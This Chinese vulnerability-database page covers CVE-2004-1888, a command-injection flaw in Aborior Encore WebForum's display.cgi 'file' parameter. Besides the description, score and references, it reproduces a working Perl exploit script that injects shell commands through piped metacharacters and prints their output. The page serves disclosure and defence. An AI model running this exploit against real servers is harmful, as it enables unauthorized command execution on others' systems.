CVE-2004-1888
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:02:25
NMCOE    

[原文]display.cgi in Aborior Encore WebForum allows remote to execute arbitrary commands via shell metacharacters in the file variable.


[CNNVD]Aborior Encore Web Forum远程任意命令执行漏洞(CNNVD-200412-425)

        
        Abrior's Encore WebForum是一款基于WEB的论坛系统。
        Abrior's Encore WebForum对用户提交的URI请求缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        问题存在于'display.cgi'脚本上,由于对用户提交给'file'参数缺少充分过滤,提交包含SHELL元字符的数据可以WEB权限在系统上执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1888
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1888
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-425
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108100973820868&w=2
(UNKNOWN)  BUGTRAQ  20040403 Remote Exploit for Aborior's Encore Web Forum
http://www.securityfocus.com/archive/1/archive/1/437813/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060620 display.cgi
http://www.securityfocus.com/archive/1/archive/1/437978/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060621 Re: display.cgi
http://www.securityfocus.com/bid/10040
(UNKNOWN)  BID  10040
http://www.securitytracker.com/id?1009652
(UNKNOWN)  SECTRACK  1009652
http://xforce.iss.net/xforce/xfdb/15725
(UNKNOWN)  XF  encore-display-command-execution(15725)

- 漏洞信息

Aborior Encore Web Forum远程任意命令执行漏洞
高危 输入验证
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Abrior's Encore WebForum是一款基于WEB的论坛系统。
        Abrior's Encore WebForum对用户提交的URI请求缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        问题存在于'display.cgi'脚本上,由于对用户提交给'file'参数缺少充分过滤,提交包含SHELL元字符的数据可以WEB权限在系统上执行。
        

- 公告与补丁

        厂商补丁:
        Aborior
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.aborior.com/encore/index.shtml

- 漏洞信息 (23907)

Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability (EDBID:23907)
cgi webapps
2004-04-03 Verified
0 K-159
N/A [点击下载]
source: http://www.securityfocus.com/bid/10040/info

Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.

A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application. 

############################################################
#!/usr/bin/perl -w
#
# Remote Exploit Aborior's Encore Web Forum by Schizoprenic
# Bug found by k-159 from g-security.tk

require LWP::UserAgent;
use Getopt::Std;

getopts('t:d:c:');
our($opt_t, $opt_d, $opt_c);

my $target = $opt_t;
my $dir = $opt_d;
my $cmd = $opt_c;

print "Remote Exploit Aborior's Encore Web Forum  by Schizoprenic\n";
print "Xnuxer Research Laboratory (http://www.infosekuriti.com)\n";
print "Target: $target\n";
print "Path Dir: $dir\n";
print "Command: $cmd\n";

my $ua = LWP::UserAgent->new;
$ua->agent("IE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$req = "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

my $response = $ua->get($req);
print "--------------------RESULT--------------------\n";

if ($response->is_success) {
     print $response->content;
} else {
     die $response->status_line;
}

print "----------------------------------------------\n";

# EOF by Xnuxer
--
		

- 漏洞信息

16831
Aborior Encore WebForum display.cgi file Variable Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Aborior Encore WebForum contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when shell commands are passed via the 'file' variable in the display.cgi script. This flaw may lead to a loss of integrity.

- 时间线

2004-04-03 Unknow
2004-04-03 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站